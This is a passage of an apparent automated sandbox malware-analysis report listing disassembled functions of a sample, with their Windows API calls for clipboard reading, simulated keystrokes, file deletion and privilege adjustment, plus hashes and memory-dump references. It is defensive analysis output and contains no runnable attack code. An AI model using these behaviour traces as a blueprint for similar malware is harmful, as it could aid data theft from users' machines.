                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: LongNamePath_memmove
                                              • String ID:
                                              • API String ID: 2514874351-0
                                              • Opcode ID: 0f7c871e5d3dab7de371a7fe575afd531042eeefa234700f0b6c182a31d23d0e
                                              • Instruction ID: 93130a6237326361e44f0a503bdf9bd69089dc7483e1fc7b1ba27067f3243c33
                                              • Opcode Fuzzy Hash: 0f7c871e5d3dab7de371a7fe575afd531042eeefa234700f0b6c182a31d23d0e
                                              • Instruction Fuzzy Hash: 63E0863290012857C721A69C9C05FEA77DDDBCD690F0401F6FC08D7204D9659D818691
                                              Function 00B94D18 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                              Download Yara Rule
                                              APIs
                                              • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00B94D31
                                                • Part of subcall function 00B41821: _memmove.LIBCMT ref: 00B4185B
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: FolderPath_memmove
                                              • String ID:
                                              • API String ID: 3334745507-0
                                              • Opcode ID: ad5f875b9c5ce034dfe76cac6b4a3f01c1f57dbe2d44bdb34cbaaa139e0844a9
                                              • Instruction ID: 9c409c3d535dc092f5cfa1ced9331edee0e3f383f603da5df923c4d79f60aff0
                                              • Opcode Fuzzy Hash: ad5f875b9c5ce034dfe76cac6b4a3f01c1f57dbe2d44bdb34cbaaa139e0844a9
                                              • Instruction Fuzzy Hash: 47D05EA191032C6BDB64E6A89C0DDB77BACD744221F000AE17C5CC3201ED249D8586E1
                                              Function 00B9394D Relevance: 1.5, APIs: 1, Instructions: 20fileCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B9384C: SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000001,00000000,00000000,00B93959,00000000,00000000,?,00B805DB,00BE8070,00000002,?,?), ref: 00B938CA
                                              • WriteFile.KERNELBASE(00000000,?,?,?,00000000,00000000,00000000,?,00B805DB,00BE8070,00000002,?,?,?,00000000), ref: 00B93967
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: File$PointerWrite
                                              • String ID:
                                              • API String ID: 539440098-0
                                              • Opcode ID: 80404a1f6f9efebef14950c536d218085d293ca1776a12e88ba26ceff99213d0
                                              • Instruction ID: 0fdb4e75e4eab7f43a310d76131c381dbb2b143be091b96eac355c045c3040b8
                                              • Opcode Fuzzy Hash: 80404a1f6f9efebef14950c536d218085d293ca1776a12e88ba26ceff99213d0
                                              • Instruction Fuzzy Hash: A0E04F35410208FBDB20AF94D805E9AB7FCEB04710F00455AFD4092111DBB29E149B90
                                              Function 00B442CF Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                              Download Yara Rule
                                              APIs
                                              • FindCloseChangeNotification.KERNELBASE(?,?,00000000,00B72F8B), ref: 00B442EF
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ChangeCloseFindNotification
                                              • String ID:
                                              • API String ID: 2591292051-0
                                              • Opcode ID: a29a14a2950ae08bfdcbc34093918b0ebf142a0a9b47dba3cdaa07f2770f7c19
                                              • Instruction ID: cbadb67e102e41ee73fbdd31c7eb7d381925f02b4bc316a40b4e28019e5c8660
                                              • Opcode Fuzzy Hash: a29a14a2950ae08bfdcbc34093918b0ebf142a0a9b47dba3cdaa07f2770f7c19
                                              • Instruction Fuzzy Hash: 5AE0B6B5410B11DFC3314F1AE804412FBF4FFE53713214A6EE4E692660D7B059AADB50
                                              Function 00B93EF7 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                              Download Yara Rule
                                              APIs
                                              • CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,00B93E7D,?,?,?), ref: 00B93F0D
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CopyFile
                                              • String ID:
                                              • API String ID: 1304948518-0
                                              • Opcode ID: b67e4b71880137cd47a3ec46b6d621a61c02fff5e82507be18a2e2b8ef5b3c75
                                              • Instruction ID: 740eb31dbcb3badfa8a336f06f4cc30e58c297560a67bbd92e6a64a73cb6a2b9
                                              • Opcode Fuzzy Hash: b67e4b71880137cd47a3ec46b6d621a61c02fff5e82507be18a2e2b8ef5b3c75
                                              • Instruction Fuzzy Hash: 73D0A7315E020CFBEF50DFA0CC06FA8B7ACE705706F1002A4B504DA0E0DA7269149795
                                              Function 00B442AE Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00B806E6,00000000,00000000,00000000), ref: 00B442BF
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: FilePointer
                                              • String ID:
                                              • API String ID: 973152223-0
                                              • Opcode ID: cebdf9a6b1570870817220359f663dd3fc39f4f3717f09562f2add0ac195950f
                                              • Instruction ID: 6f6a2612fb244c8fc19c807a5e10c4a1c5e2d7bc5b63105806ded0e2518f6309
                                              • Opcode Fuzzy Hash: cebdf9a6b1570870817220359f663dd3fc39f4f3717f09562f2add0ac195950f
                                              • Instruction Fuzzy Hash: 42D0C77465030CBFE711DB80DC46FA9B77CE705710F100194FD0467290D6B27D508795
                                              Function 00B94FEC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?,00B93BFE), ref: 00B94FED
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: a12c0abbf212c24eb2952d27573d5caa5ed6d5d1d35d0aea080f29b79fb49f6f
                                              • Instruction ID: 2e549bb295fbf4c20e2745a1188f35e14205de36cae646ab5145cf07e8b9e6a5
                                              • Opcode Fuzzy Hash: a12c0abbf212c24eb2952d27573d5caa5ed6d5d1d35d0aea080f29b79fb49f6f
                                              • Instruction Fuzzy Hash: 75B09234010602969D282E3C1948A99338198463A97E81BD1E47C964E1D7398C4BA520
                                              Function 00B5547B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: __wfsopen
                                              • String ID:
                                              • API String ID: 197181222-0
                                              • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                              • Instruction ID: 4e0d39a3b854e614ab3ad75908346158646768beccc069a4621cbb51f3783b63
                                              • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                              • Instruction Fuzzy Hash: F5B0927644020C77CE112A82EC03B693B699B4066AF4080A0FF0C1C262A673A6A49A89
                                              Function 00B9D6BE Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLastError.KERNEL32(00000002,00000000), ref: 00B9D842
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ErrorLast
                                              • String ID:
                                              • API String ID: 1452528299-0
                                              • Opcode ID: 2a81d05be73f08d9e4ebd037cb4fde8d8136858180e9e3d117f66ffa69cbb377
                                              • Instruction ID: bcffccadc55f6f3025a88c5711e776e338e80bd18890d0f0876388988403f1a6
                                              • Opcode Fuzzy Hash: 2a81d05be73f08d9e4ebd037cb4fde8d8136858180e9e3d117f66ffa69cbb377
                                              • Instruction Fuzzy Hash: 8B7183706043018FCB14EF69D4D1A6AB7E0EF89354F044ABDF4969B2A2DB30ED45CB52
                                              Function 00B9C270 Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B94005: FindFirstFileW.KERNELBASE(?,?), ref: 00B9407C
                                                • Part of subcall function 00B94005: DeleteFileW.KERNELBASE(?,?,?,?), ref: 00B940CC
                                                • Part of subcall function 00B94005: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00B940DD
                                                • Part of subcall function 00B94005: FindClose.KERNEL32(00000000), ref: 00B940F4
                                              • GetLastError.KERNEL32 ref: 00B9C292
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                              • String ID:
                                              • API String ID: 2191629493-0
                                              • Opcode ID: a75c607fc76562b776e12ec6d30053355dc480d473c34cf1f1f4fe52f5a07329
                                              • Instruction ID: d6d40b6f0071eeb1e5053e75db5e420f3871a73ea6016366df249e64d2396203
                                              • Opcode Fuzzy Hash: a75c607fc76562b776e12ec6d30053355dc480d473c34cf1f1f4fe52f5a07329
                                              • Instruction Fuzzy Hash: 31F0A0322102108FCB14EF59D850F6AB7E5EF89320F0580A9F9098B352CB70BC02CB94

                                              Non-executed Functions

                                              Function 00BBD164 Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B329E2: GetWindowLongW.USER32(?,000000EB), ref: 00B329F3
                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00BBD208
                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00BBD249
                                              • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00BBD28E
                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00BBD2B8
                                              • SendMessageW.USER32 ref: 00BBD2E1
                                              • _wcsncpy.LIBCMT ref: 00BBD359
                                              • GetKeyState.USER32(00000011), ref: 00BBD37A
                                              • GetKeyState.USER32(00000009), ref: 00BBD387
                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00BBD39D
                                              • GetKeyState.USER32(00000010), ref: 00BBD3A7
                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00BBD3D0
                                              • SendMessageW.USER32 ref: 00BBD3F7
                                              • SendMessageW.USER32(?,00001030,?,00BBB9BA), ref: 00BBD4FD
                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00BBD513
                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00BBD526
                                              • SetCapture.USER32(?), ref: 00BBD52F
                                              • ClientToScreen.USER32(?,?), ref: 00BBD594
                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00BBD5A1
                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00BBD5BB
                                              • ReleaseCapture.USER32 ref: 00BBD5C6
                                              • GetCursorPos.USER32(?), ref: 00BBD600
                                              • ScreenToClient.USER32(?,?), ref: 00BBD60D
                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00BBD669
                                              • SendMessageW.USER32 ref: 00BBD697
                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00BBD6D4
                                              • SendMessageW.USER32 ref: 00BBD703
                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00BBD724
                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00BBD733
                                              • GetCursorPos.USER32(?), ref: 00BBD753
                                              • ScreenToClient.USER32(?,?), ref: 00BBD760
                                              • GetParent.USER32(?), ref: 00BBD780
                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00BBD7E9
                                              • SendMessageW.USER32 ref: 00BBD81A
                                              • ClientToScreen.USER32(?,?), ref: 00BBD878
                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00BBD8A8
                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00BBD8D2
                                              • SendMessageW.USER32 ref: 00BBD8F5
                                              • ClientToScreen.USER32(?,?), ref: 00BBD947
                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00BBD97B
                                                • Part of subcall function 00B329AB: GetWindowLongW.USER32(?,000000EB), ref: 00B329BC
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00BBDA17
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                              • String ID: @GUI_DRAGID$F
                                              • API String ID: 3977979337-4164748364
                                              • Opcode ID: f5ce2e361e75ae10f02854c16d0b711645c1cc9ea029c543ac5e0a04ab030b5d
                                              • Instruction ID: 3db9de4396dc41bbc2b47c1679f3c5a2ef4323b23ef2213eafed00974a8d3fa6
                                              • Opcode Fuzzy Hash: f5ce2e361e75ae10f02854c16d0b711645c1cc9ea029c543ac5e0a04ab030b5d
                                              • Instruction Fuzzy Hash: E8428C30209241EFD724DF28C884FBABBE5FF48310F140699F695972A1EBB5AC54CB52
                                              Function 00B45EDA Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetForegroundWindow.USER32(00000000,?), ref: 00B45EE2
                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B810D7
                                              • IsIconic.USER32(?), ref: 00B810E0
                                              • ShowWindow.USER32(?,00000009), ref: 00B810ED
                                              • SetForegroundWindow.USER32(?), ref: 00B810F7
                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B8110D
                                              • GetCurrentThreadId.KERNEL32 ref: 00B81114
                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B81120
                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 00B81131
                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 00B81139
                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 00B81141
                                              • SetForegroundWindow.USER32(?), ref: 00B81144
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B81159
                                              • keybd_event.USER32(00000012,00000000), ref: 00B81164
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B8116E
                                              • keybd_event.USER32(00000012,00000000), ref: 00B81173
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B8117C
                                              • keybd_event.USER32(00000012,00000000), ref: 00B81181
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B8118B
                                              • keybd_event.USER32(00000012,00000000), ref: 00B81190
                                              • SetForegroundWindow.USER32(?), ref: 00B81193
                                              • AttachThreadInput.USER32(?,?,00000000), ref: 00B811BA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                              • String ID: Shell_TrayWnd
                                              • API String ID: 4125248594-2988720461
                                              • Opcode ID: cd02fe3bfec7b31152ff3f490882106bbf16ceb3017d488e008495d68510b9ea
                                              • Instruction ID: 32469aecb1ef6448f5ebe377e86b44d6c113ed84457426f9d43c98536a39b3df
                                              • Opcode Fuzzy Hash: cd02fe3bfec7b31152ff3f490882106bbf16ceb3017d488e008495d68510b9ea
                                              • Instruction Fuzzy Hash: 44314171A51318BBEB207B659C89F7F7EACEB48B50F104065FA04BB1D1CAB05D51EBA0
                                              Function 00B88F2E Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B89399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B893E3
                                                • Part of subcall function 00B89399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B89410
                                                • Part of subcall function 00B89399: GetLastError.KERNEL32 ref: 00B8941D
                                              • _memset.LIBCMT ref: 00B88F71
                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00B88FC3
                                              • CloseHandle.KERNEL32(?), ref: 00B88FD4
                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00B88FEB
                                              • GetProcessWindowStation.USER32 ref: 00B89004
                                              • SetProcessWindowStation.USER32(00000000), ref: 00B8900E
                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00B89028
                                                • Part of subcall function 00B88DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B88F27), ref: 00B88DFE
                                                • Part of subcall function 00B88DE9: CloseHandle.KERNEL32(?,?,00B88F27), ref: 00B88E10
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                              • String ID: $default$winsta0
                                              • API String ID: 2063423040-1027155976
                                              • Opcode ID: a91e3f15b92a735fe9a7f50fa999c7fb26c09bcfc5103c7ab9df1225f6df24ed
                                              • Instruction ID: 10047b7e6eec8d02ee3a7cdb8511d4c93c9e0222781f9ba5aadb38cf634ec234
                                              • Opcode Fuzzy Hash: a91e3f15b92a735fe9a7f50fa999c7fb26c09bcfc5103c7ab9df1225f6df24ed
                                              • Instruction Fuzzy Hash: 07812671914249BFDF11BFA4DC49ABE7BB9EF08304F0841A9F911B6261DB318E15DB60
                                              Function 00BA4632 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenClipboard.USER32(00BC0980), ref: 00BA465C
                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 00BA466A
                                              • GetClipboardData.USER32(0000000D), ref: 00BA4672
                                              • CloseClipboard.USER32 ref: 00BA467E
                                              • GlobalLock.KERNEL32(00000000), ref: 00BA469A
                                              • CloseClipboard.USER32 ref: 00BA46A4
                                              • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00BA46B9
                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 00BA46C6
                                              • GetClipboardData.USER32(00000001), ref: 00BA46CE
                                              • GlobalLock.KERNEL32(00000000), ref: 00BA46DB
                                              • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00BA470F
                                              • CloseClipboard.USER32 ref: 00BA481F
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                              • String ID:
                                              • API String ID: 3222323430-0
                                              • Opcode ID: e0352462df09e72e7438083d9429a405a57007ea2fe998dcc3c689d3406dff80
                                              • Instruction ID: 64a530f231219d3fd11ddc435c6f1be67f6e33da9bb380fe123490793273e0b0
                                              • Opcode Fuzzy Hash: e0352462df09e72e7438083d9429a405a57007ea2fe998dcc3c689d3406dff80
                                              • Instruction Fuzzy Hash: AD518D31248201ABD300FF68EC89F6E77E8EBDAB11F1045A9F556D71A1DFB0D9058B62
                                              Function 00B9CD9F Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?), ref: 00B9CDD0
                                              • FindClose.KERNEL32(00000000), ref: 00B9CE24
                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B9CE49
                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B9CE60
